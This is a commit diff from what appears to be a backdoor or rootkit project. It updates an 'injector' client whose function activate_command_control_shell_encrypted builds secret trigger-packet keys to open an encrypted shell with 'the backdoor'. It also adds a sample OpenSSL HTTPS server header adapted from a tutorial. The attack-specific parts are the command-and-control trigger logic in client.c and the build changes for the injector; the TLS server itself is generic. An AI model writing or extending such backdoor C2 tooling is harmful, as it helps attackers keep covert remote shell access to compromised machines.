Fixed keys of trigger packet V1, added sample servers, fixed client bug

src/client/Makefile

@@ -1,15 +1,15 @@
 CC = gcc
-HEADERS = lib/RawTCP.h
+HEADERS = lib/RawTCP.h include/sslserver.h
 EXTRA_CFLAGS= -I$(PWD)/lib
 
 default:
 	make injector
 
 client.o: client.c $(HEADERS)
-	gcc -c client.c
+	gcc -c -Wno-deprecated-declarations client.c 
 
 injector: client.o lib/libRawTCP_Lib.a
-	gcc -lm -o injector client.o -L. lib/libRawTCP_Lib.a
+	gcc -lm -o injector client.o -L/usr/lib -lssl -lcrypto -L. lib/libRawTCP_Lib.a
 
 clean:
 	-rm -f client.o

src/client/client.c

@@ -13,6 +13,7 @@
 #include "../common/constants.h"
 #include "../common/c&c.h"
 #include "../common/protocol.h"
+#include "include/sslserver.h"
 
 // For printing with colors
 #define KGRN  "\x1B[32m"
@@ -205,7 +206,7 @@ void activate_command_control_shell_encrypted(char* argv){
     char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
     char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
     //K3 with command to start the encrypted connection with the backdoor
-    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3 + CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1;
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL;
     char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
     strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){

src/client/include/sslserver.h

@@ -0,0 +1,327 @@
+// This code is based from the following tutorial:
+// https://aticleworld.com/ssl-server-client-using-openssl-in-c/
+// gcc -Wall -o server server.c -L/usr/lib -lssl -lcrypto
+// sudo ./server <portnum>
+
+#include "openssl/err.h"
+#include "openssl/ssl.h"
+#include <arpa/inet.h>
+#include <errno.h>
+#include <malloc.h>
+#include <netinet/in.h>
+#include <resolv.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define FAIL -1
+
+#define USE_FUNCTIONS 0
+
+void instructionsForPem(void) {
+  printf("\n");
+  printf("\n");
+  printf("Did you forget to create your mycert.pem file?\n");
+  printf("\n");
+  printf("Run: openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout "
+         "mycert.pem -out mycert.pem\n");
+  printf("\n");
+  printf("If you haven't, but that's my best guess of what has gone wrong..\n");
+  printf("\n");
+  printf("\n");
+}
+
+#if (USE_FUNCTIONS)
+SSL_CTX *InitServerCTX(void) {
+  const SSL_METHOD *method;
+  SSL_CTX *ctx;
+
+  OpenSSL_add_all_algorithms();     /* load & register all cryptos, etc. */
+  SSL_load_error_strings();         /* load all error messages */
+  method = TLSv1_2_server_method(); /* create new server-method instance */
+  ctx = SSL_CTX_new(method);        /* create new context from method */
+  if (ctx == NULL) {
+    ERR_print_errors_fp(stderr);
+    abort();
+  }
+  return ctx;
+}
+
+void LoadCertificates(SSL_CTX *ctx, const char *CertFile, const char *KeyFile) {
+  /* set the local certificate from CertFile */
+  if (SSL_CTX_use_certificate_file(ctx, CertFile, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* set the private key from KeyFile (may be the same as CertFile) */
+  if (SSL_CTX_use_PrivateKey_file(ctx, KeyFile, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* verify private key */
+  if (!SSL_CTX_check_private_key(ctx)) {
+    fprintf(stderr, "Private key does not match the public certificate\n");
+    abort();
+  }
+}
+
+// Create the SSL socket and intialize the socket address structure
+int OpenListener(int port) {
+  int sd;
+  struct sockaddr_in addr;
+
+  sd = socket(PF_INET, SOCK_STREAM, 0);
+  bzero(&addr, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_port = htons(port);
+  addr.sin_addr.s_addr = INADDR_ANY;
+  if (bind(sd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
+    perror("can't bind port");
+    abort();
+  }
+  if (listen(sd, 10) != 0) {
+    perror("Can't configure listening port");
+    abort();
+  }
+  return sd;
+}
+
+void ShowCerts(SSL *ssl) //? RBW
+{
+  X509 *cert;
+  char *line;
+
+  cert = SSL_get_peer_certificate(ssl); /* Get certificates (if available) */
+  if (cert != NULL) {
+    printf("Server certificates:\n");
+    line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
+    printf("Subject: %s\n", line);
+    free(line);
+    line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
+    printf("Issuer: %s\n", line);
+    free(line);
+    X509_free(cert);
+  } else {
+    printf("No certificates.\n");
+  }
+}
+
+/* Serve the connection -- threadable */
+void Servlet(SSL *ssl) {
+  char buf[1024] = {0};
+
+  int sd, bytes;
+
+  // this is my attempt to run HTTPS.. This is sort of the minimal header that
+  // seems to work.  \r is absolutely necessary.
+  const char *szHelloWorld =
+      "HTTP/1.1 200 OK\r\n"
+      "Content-type: text/html\r\n"
+      "\r\n"
+      "<html>\n"
+      "<body>\n"
+      "<h1>So, this works, if you added a security exception to your web "
+      "browser</h1>\n"
+      "<h2>Or.... are using a genuine certificate.</h2>\n"
+      "<h3>This is using functions BTW..</h3>\n"
+      "</body>\n"
+      "</html>\n";
+
+  if (SSL_accept(ssl) == FAIL) /* do SSL-protocol accept */
+  {
+    ERR_print_errors_fp(stderr);
+  } else {
+    ShowCerts(ssl);                          /* get any certificates */
+    bytes = SSL_read(ssl, buf, sizeof(buf)); /* get request */
+    buf[bytes] = '\0';
+
+    printf("Client msg:\n[%s]\n", buf);
+
+    if (bytes > 0) {
+      printf("Reply with:\n[%s]\n", szHelloWorld);
+      SSL_write(ssl, szHelloWorld, strlen(szHelloWorld));
+    } else {
+      ERR_print_errors_fp(stderr);
+    }
+  }
+  sd = SSL_get_fd(ssl); /* get socket connection */
+  SSL_free(ssl);        /* release SSL state */
+  close(sd);            /* close connection */
+}
+#endif
+
+int server_run(int argc, char **argv) {
+  SSL_CTX *ctx;
+  int server;
+  int portnum;
+  const char *szPemPublic = "mycert.pem";
+  const char *szPemPrivate = "mycert.pem";
+#if (!(USE_FUNCTIONS))
+  const SSL_METHOD *method;
+#endif
+
+  if (argc != 2) {
+    printf("Usage: %s <portnum>\n", argv[0]);
+    exit(0);
+  }
+
+  portnum = atoi(argv[1]);
+
+  if (portnum < 1024) {
+    if (getuid() != 0) {
+      printf("This program must be run as root/sudo user since your port # "
+             "(%d) is < 1024\n",
+             portnum);
+      exit(1);
+    }
+  }
+
+  SSL_library_init(); /* Initialize the SSL library */
+
+#if (USE_FUNCTIONS)
+  ctx = InitServerCTX(); /* initialize SSL */
+#else
+  // InitServerCTX ();
+  OpenSSL_add_all_algorithms();     /* load & register all cryptos, etc. */
+  SSL_load_error_strings();         /* load all error messages */
+  method = TLSv1_2_server_method(); /* create new server-method instance */
+  ctx = SSL_CTX_new(method);        /* create new context from method */
+  if (ctx == NULL) {
+    ERR_print_errors_fp(stderr);
+    abort();
+  }
+#endif
+
+#if (USE_FUNCTIONS)
+  LoadCertificates(ctx, szPemPublic, szPemPrivate); /* load certs */
+#else
+  /* set the local certificate from CertFile */
+  if (SSL_CTX_use_certificate_file(ctx, szPemPublic, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* set the private key from KeyFile (may be the same as CertFile) */
+  if (SSL_CTX_use_PrivateKey_file(ctx, szPemPrivate, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* verify private key */
+  if (!SSL_CTX_check_private_key(ctx)) {
+    fprintf(stderr, "Private key does not match the public certificate\n");
+    abort();
+  }
+#endif
+
+#if (USE_FUNCTIONS)
+  server = OpenListener(portnum); /* create server socket */
+#else
+  struct sockaddr_in addr;
+
+  server = socket(PF_INET, SOCK_STREAM, 0);
+  bzero(&addr, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_port = htons(portnum);
+  addr.sin_addr.s_addr = INADDR_ANY;
+  if (bind(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
+    perror("can't bind port");
+    abort();
+  }
+  if (listen(server, 10) != 0) {
+    perror("Can't configure listening port");
+    abort();
+  }
+#endif
+
+  for (;;) {
+    struct sockaddr_in addr;
+    socklen_t len = sizeof(addr);
+    SSL *ssl;
+
+#if (!(USE_FUNCTIONS))
+    char buf[1024] = {0};
+    int sd, bytes;
+
+    // this is my attempt to run HTTPS.. This is sort of the minimal header that
+    // seems to work.  \r is absolutely necessary.
+    const char *szHttpServerResponse =
+        "HTTP/1.1 200 OK\r\n"
+        "Content-type: text/html\r\n"
+        "\r\n"
+        "<html>\n"
+        "<body>\n"
+        "<h1>So, this works, if you added a security exception to your web "
+        "browser</h1>\n"
+        "<h2>Or.... are using a genuine certificate.</h2>\n"
+        "<h3>This is <u><i>NOT</i></u> using functions BTW..</h3>\n"
+        "</body>\n"
+        "</html>\n";
+#endif
+    int client;
+
+    client = accept(server, (struct sockaddr *)&addr,
+                    &len); /* accept connection as usual */
+    printf("Connection: %s:%d\n", inet_ntoa(addr.sin_addr),
+           ntohs(addr.sin_port));
+    ssl = SSL_new(ctx);      /* get new SSL state with context */
+    SSL_set_fd(ssl, client); /* set connection socket to SSL state */
+#if (USE_FUNCTIONS)
+    Servlet(ssl); /* service connection */
+#else
+    if (SSL_accept(ssl) == FAIL) /* do SSL-protocol accept */
+    {
+      ERR_print_errors_fp(stderr);
+    } else {
+      X509 *cert;
+      char *line;
+
+      cert =
+          SSL_get_peer_certificate(ssl); /* Get certificates (if available) */
+      if (cert != NULL) {
+        printf("Server certificates:\n");
+        line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
+        printf("Subject: %s\n", line);
+        free(line);
+        line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
+        printf("Issuer: %s\n", line);
+        free(line);
+        X509_free(cert);
+      } else {
+        printf("No certificates.\n");
+      }
+
+      // ShowCerts (ssl);                         /* get any certificates */
+      bytes = SSL_read(ssl, buf, sizeof(buf)); /* get request */
+      buf[bytes] = '\0';
+
+      printf("Client msg:\n[%s]\n", buf);
+
+      if (bytes > 0) {
+        printf("Reply with:\n[%s]\n", szHttpServerResponse);
+        SSL_write(ssl, szHttpServerResponse, strlen(szHttpServerResponse));
+      } else {
+        ERR_print_errors_fp(stderr);
+      }
+    }
+    sd = SSL_get_fd(ssl); /* get socket connection */
+    SSL_free(ssl);        /* release SSL state */
+    close(sd);            /* close connection */
+#endif
+    //    break;
+  }
+  close(server); /* close server socket */
+
+  ERR_free_strings(); /* free memory from SSL_load_error_strings */
+  EVP_cleanup();      /* free memory from OpenSSL_add_all_algorithms */
+  SSL_CTX_free(ctx);  /* release context */
+
+  return 0;
+}